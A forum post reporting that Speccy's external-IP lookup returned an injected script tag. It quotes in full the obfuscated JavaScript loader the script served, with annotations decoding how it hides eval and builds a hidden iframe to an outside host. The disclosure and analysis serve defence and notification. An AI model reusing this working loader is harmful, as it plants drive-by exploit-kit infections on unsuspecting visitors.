
Speccy querying a hacked page



While perusing the latest version of Speccy (1.10.248), I noticed something odd under Network.

 

"External IP Address <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx"

with the ending x's being the rest of my public IP.

 

speccyi.png

 

I had no idea what this was, so I copied the address (hxxp://www.nsa-lab.com/js.php — intentionally de-linked for this post) into Google Chrome to try to figure out what was going on.

 

When I do that, I get this:

avastu.png

 

The JavaScript returned by that address is:

 

// NOTE(review): obfuscated loader quoted from the js.php response above; annotated for
// analysis only, code left byte-for-byte as posted. What the visible code does:
//  1. createCSS() appends a <style> element carrying the rule
//     `#va { background:url(data:,ring.fromCharCode) }` (innerHTML on non-IE, addRule() on IE).
//  2. The loop over document.styleSheets reads that rule back out: R = "St" + the "ri…"
//     fragment matched from the rule's cssText (yielding the text "String.fromCharCode"),
//     and F = selectorText with the leading '#' removed ("va"). Neither string appears
//     literally in the script, which is the point of the CSS round-trip.
//  3. i = getSeconds() of the fixed Date(2020,11,3,2,21,8) minus 4, i.e. 4. Every entry
//     of o[] below is a character code shifted by that constant.
//  4. b = eval("e"+F+"l") is eval itself; J is presumably eval(R), i.e. String.fromCharCode —
//     the `b®` on the last line looks like a forum-side mangling of `b(R)`, confirm against
//     the original response. The final loop decodes o[] into the string D and evals it.
// With i = 4 the array begins "var " and contains the code sequences for "iframe" and
// "visibility:hidden", consistent with a hidden-iframe injection as the second stage;
// decode offline in an isolated environment to confirm before acting on it.
function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,ring.fromCharCode)');var R=null;var h=document.styleSheets;var F = null;for(var f=0; f < h.length; f++){try{var Z = h[f].cssRules || h[f].rules;for(var m=0;m < Z.length; m++){var Q = Z.item ? Z.item(m) : Z[m];if(Q.selectorText!='#va')continue;x = (Q.cssText) ? Q.cssText : Q.style.cssText;R = "St" + x.match(/(ri[^")]+)/)[1]; F=Q.selectorText.substr(1);};} catch(e){};}L=new Date(2020,11,3,2,21,8);i=L.getSeconds()-4;var 
// o: the encoded second stage, one (charCode - i) per element.
o=[i+114,i+93,i+110,i+28,i+61,i+57,i+30,i+94,i+107,i+96,i+117,i+30,i+55,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+97,i+104,i+111,i+97,i+28,i+119,i+114,i+93,i+110,i+28,i+67,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+61,i+37,i+55,i+112,i+110,i+117,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+67,i+37,i+55,i+121,i+28,i+95,i+93,i+112,i+95,i+100,i+28,i+36,i+97,i+37,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+94,i+107,i+96,i+117,i+28,i+57,i+28,i+67,i+55,i+121,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+28,i+97,i+104,i+111,i+97,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+115,i+110,i+101,i+112,i+97,i+36,i+30,i+56,i+101,i+98,i+110,i+93,i+105,i+97,i+28,i+111,i+110,i+95,i+57,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+28,i+115,i+101,i+96,i+112,i+100,i+57,i+35,i+45,i+44,i+35,i+28,i+100,i+97,i+101,i+99,i+100,i+112,i+57,i+35,i+45,i+44,i+35,i+28,i+111,i+112,i+117,i+104,i+97,i+57,i+35,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+54,i+100,i+101,i+96,i+96,i+97,i+106,i+55,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+54,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+55,i+104,i+97,i+98,i+112,i+54,i+44,i+55,i+112,i+107,i+108,i+54,i+44,i+55,i+35,i+58,i+56,i+43,i+101,i+98,i+110,i+93,
i+105,i+97,i+58,i+30,i+37,i+55,i+121,i+121,i+114,i+93,i+110,i+28,i+68,i+57,i+44,i+55,i+98,i+113,i+106,i+95,i+112,i+101,i+107,i+106,i+28,i+97,i+36,i+37,i+119,i+115,i+100,i+101,i+104,i+97,i+36,i+68,i+39,i+39,i+28,i+56,i+28,i+45,i+44,i+44,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+114,i+93,i+110,i+28,i+111,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+35,i+101,i+98,i+110,i+93,i+105,i+97,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+111,i+110,i+95,i+35,i+40,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+57,i+35,i+100,i+101,i+96,i+96,i+97,i+106,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+57,i+35,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+104,i+97,i+98,i+112,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+112,i+107,i+108,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+115,i+101,i+96,i+112,i+100,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+100,i+97,i+101,i+99,i+100,i+112,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+111,i+37,i+55,i+121];b=eval("e" + F + "l");var D='';J=b®;for(var f=0; f < o.length; 
f++){O=b(o[f]);D+=J(O);}b(D);
// b(D): the decoded stage is handed straight to eval — this is the point where a
// detection rule or a script-blocking policy would have to intervene.

 

 

Posted about it on the Staff forums at BleepingComputer.com, and Grinler (Lawrence Abrams) posted this:

 

Basically, what's happening is that Speccy is querying your IP address by going to this URL:

 

http://speccy.piriform.com/ip/

 

 

The content being returned, though, is not only the IP address but also a script tag:

 

<script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>

 

Speccy is 100% compromised. That JavaScript loads an exploit kit, which has now downloaded some malware onto my virtual machine.

 

Pretty sure this would be considered a critical security flaw.

 

-kN


Also,

 

I can see how this would affect people. If you save your report as XML and then load it, it will open Internet Explorer (or your other default browser) automatically and display the XML file. That will run the JavaScript, and boom — you are infected.


Thanks everyone for bringing this to the attention of Piriform.

 

I have sent a mass PM out to alert Piriform, so hopefully this can be taken care of right away.

